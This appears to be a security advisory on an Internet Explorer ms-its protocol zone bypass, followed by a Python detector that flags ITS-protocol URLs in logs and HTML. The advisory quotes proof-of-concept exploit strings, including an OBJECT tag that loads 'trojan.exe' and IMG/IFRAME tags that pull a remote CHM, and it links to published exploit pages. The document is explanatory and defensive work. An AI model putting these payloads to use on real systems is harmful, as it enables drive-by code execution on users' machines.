Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability
**UPDATE:** Symantec has determined that this vulnerability is being exploited "in the wild", in what appear to be targeted attacks.

The following proof-of-concept has been supplied:

`ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm`

The following example demonstrates the exploitation of this issue. The attacker would create an HTML file (i.e. launch.html) containing an OBJECT tag whose CLASSID and CODEBASE point at the payload, compiled into a CHM, such as:

`<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>`

The attacker would then reference launch.html from another page through tags that use the ms-its: protocol, such as:

```
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>
<IFRAME SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>
```

Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads:

- http://www.malware.com/junk-de-lux.html
- http://ip3e83566f.speed.planet.nl/security/newone/exploit.htm

Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Jelmer also released the following proof-of-concept example, which may bypass some filters because it uses encoded characters in the exploit string:

`ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm`

This issue is known to be exploited in the wild.
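As an added example (not part of the Symantec advisory), the following Python detector flags the URL shapes the update describes: any use of the `ms-its:` or `mk:@MSITStore:` protocol handlers, and specifically the nested `ms-its:mhtml:file://<local>!<remote .chm>::/<page>` form used in the wild. It normalizes HTML entities and percent-encoding first so that encoded variants of the kind the update mentions still match. The log lines, host names and timestamps below are constructed for the example; the `classify` and `scan` helper names are this example's own.

```python
import html
import re
from urllib.parse import unquote

# Protocol handler prefixes named in the advisory. Schemes are matched case-insensitively;
# the lookbehind stops "xms-its:" style substrings from matching inside a longer token.
ITS_SCHEME = re.compile(r"(?i)(?<![\w.-])(?:ms-its|mk:@msitstore):")

# The nested form used by the in-the-wild exploit string:
#   ms-its:mhtml:file://<local .mht>!<remote .chm>::/<page inside the CHM>
NESTED_CHM = re.compile(
    r"(?i)ms-its:mhtml:file://(?P<local>[^!\s'\"<>]*)!"
    r"(?P<remote>[^\s'\"<>]*?)::/(?P<page>[^\s'\"<>]*)"
)


def normalize(text: str) -> str:
    """Undo HTML-entity and percent-encoding (one pass each) so encoded variants match."""
    return unquote(html.unescape(text))


def classify(text: str) -> dict:
    """Classify one proxy log line or HTML fragment.

    severity is 'high' for the nested remote-CHM form, 'medium' for any other
    ITS-protocol URL, and 'none' otherwise. 'nested' holds the parsed parts of the
    nested form (local .mht path, remote .chm URL, page inside the CHM) or None.
    """
    norm = normalize(text)
    m = NESTED_CHM.search(norm)
    nested = None
    if m:
        nested = {"local": m.group("local"),
                  "remote": m.group("remote"),
                  "page": m.group("page")}
    its_scheme = bool(ITS_SCHEME.search(norm))
    if nested:
        severity = "high"
    elif its_scheme:
        severity = "medium"
    else:
        severity = "none"
    return {"its_scheme": its_scheme, "nested": nested, "severity": severity}


def scan(lines):
    """Return (line index, severity) for every line that carries an ITS indicator."""
    hits = []
    for i, line in enumerate(lines):
        result = classify(line)
        if result["severity"] != "none":
            hits.append((i, result["severity"]))
    return hits


# Constructed sample input: proxy-style log lines and one HTML fragment as a
# content filter might see it. Only the exploit string itself comes from the advisory.
SAMPLE_LINES = [
    "2004-04-08T10:02:11 10.0.0.12 GET http://www.example.com/index.html 200",
    "2004-04-08T10:02:12 10.0.0.12 GET ms-its:mhtml:file://C:\\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm",
    "<IMG SRC='ms-its:mhtml:file://C:\\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>",
    "2004-04-08T10:02:13 10.0.0.12 GET mk:@MSITStore:C:\\help.chm::/page.htm",
    # percent-encoded "::/" (constructed variant) to show why normalization matters
    "2004-04-08T10:02:14 10.0.0.12 GET ms-its:mhtml:file://C:\\foo.mht!http://www.example.com/x.chm%3A%3A/exploit.htm",
]

if __name__ == "__main__":
    for index, severity in scan(SAMPLE_LINES):
        print(f"line {index}: {severity}: {classify(SAMPLE_LINES[index])['nested']}")
```

The nested form is rated higher than a bare `mk:@MSITStore:` reference because a local help-file lookup is ordinary on a workstation, whereas a `file://` MHT combined with a remote `.chm` after the `!` is the exact pattern the update describes. Matching after normalization is a single decoding pass; a filter that decodes repeatedly, or that also matches on the raw text, catches more encodings at the cost of more false positives.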